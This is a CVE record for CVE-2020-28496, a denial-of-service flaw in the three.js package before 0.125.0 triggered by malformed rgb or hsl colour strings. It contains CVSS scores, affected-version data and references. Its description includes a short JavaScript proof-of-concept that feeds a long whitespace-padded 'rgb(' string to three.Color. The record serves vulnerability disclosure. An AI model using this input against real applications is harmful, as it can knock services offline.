CVE-2020-28496
CVSS V2 Medium 5
CVSS V3 High 7.5
Description
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
Overview
- CVE ID
- CVE-2020-28496
- Assigner
- report@snyk.io
- Vulnerability Status
- Analyzed
- Published Version
- 2021-02-18T15:15:13
- Last Modified Date
- 2021-02-25T17:05:05
Weakness Enumerations
CPE Configuration (Product)
CPE | Vulnerable | Operator | Version Start | Version End |
---|---|---|---|---|
cpe:2.3:a:three_project:three:*:*:*:*:*:node.js:*:* | 1 | OR | 0.125.0 |
CVSS Version 2
- Version
- 2.0
- Vector String
- AV:N/AC:L/Au:N/C:N/I:N/A:P
- Access Vector
- NETWORK
- Access Compatibility
- LOW
- Authentication
- NONE
- Confidentiality Impact
- NONE
- Integrity Impact
- NONE
- Availability Impact
- PARTIAL
- Base Score
- 5
- Severity
- MEDIUM
- Exploitability Score
- 10
- Impact Score
- 2.9
CVSS Version 3
- Version
- 3.1
- Vector String
- CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- Attack Vector
- NETWORK
- Attack Compatibility
- LOW
- Privileges Required
- NONE
- User Interaction
- NONE
- Scope
- UNCHANGED
- Confidentiality Impact
- NONE
- Availability Impact
- HIGH
- Base Score
- 7.5
- Base Severity
- HIGH
- Exploitability Score
- 3.9
- Impact Score
- 3.6
References
Reference URL | Reference Tags |
---|---|
https://github.com/mrdoob/three.js/issues/21132 | Exploit Issue Tracking Third Party Advisory |
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e | Patch Third Party Advisory |
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972 | Exploit Third Party Advisory |
https://snyk.io/vuln/SNYK-JS-THREE-1064931 | Exploit Third Party Advisory |
Sources
Source Name | Source URL |
---|---|
NIST | https://nvd.nist.gov/vuln/detail/CVE-2020-28496 |
MITRE | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28496 |
History
Created | Old Value | New Value | Data Type | Notes |
---|---|---|---|---|
2022-05-10 07:21:44 | Added to TrackCVE | |||
2022-12-05 22:21:42 | 2021-02-18T15:15Z | 2021-02-18T15:15:13 | CVE Published Date | updated |
2022-12-05 22:21:42 | 2021-02-25T17:05:05 | CVE Modified Date | updated | |
2022-12-05 22:21:42 | Analyzed | Vulnerability Status | updated |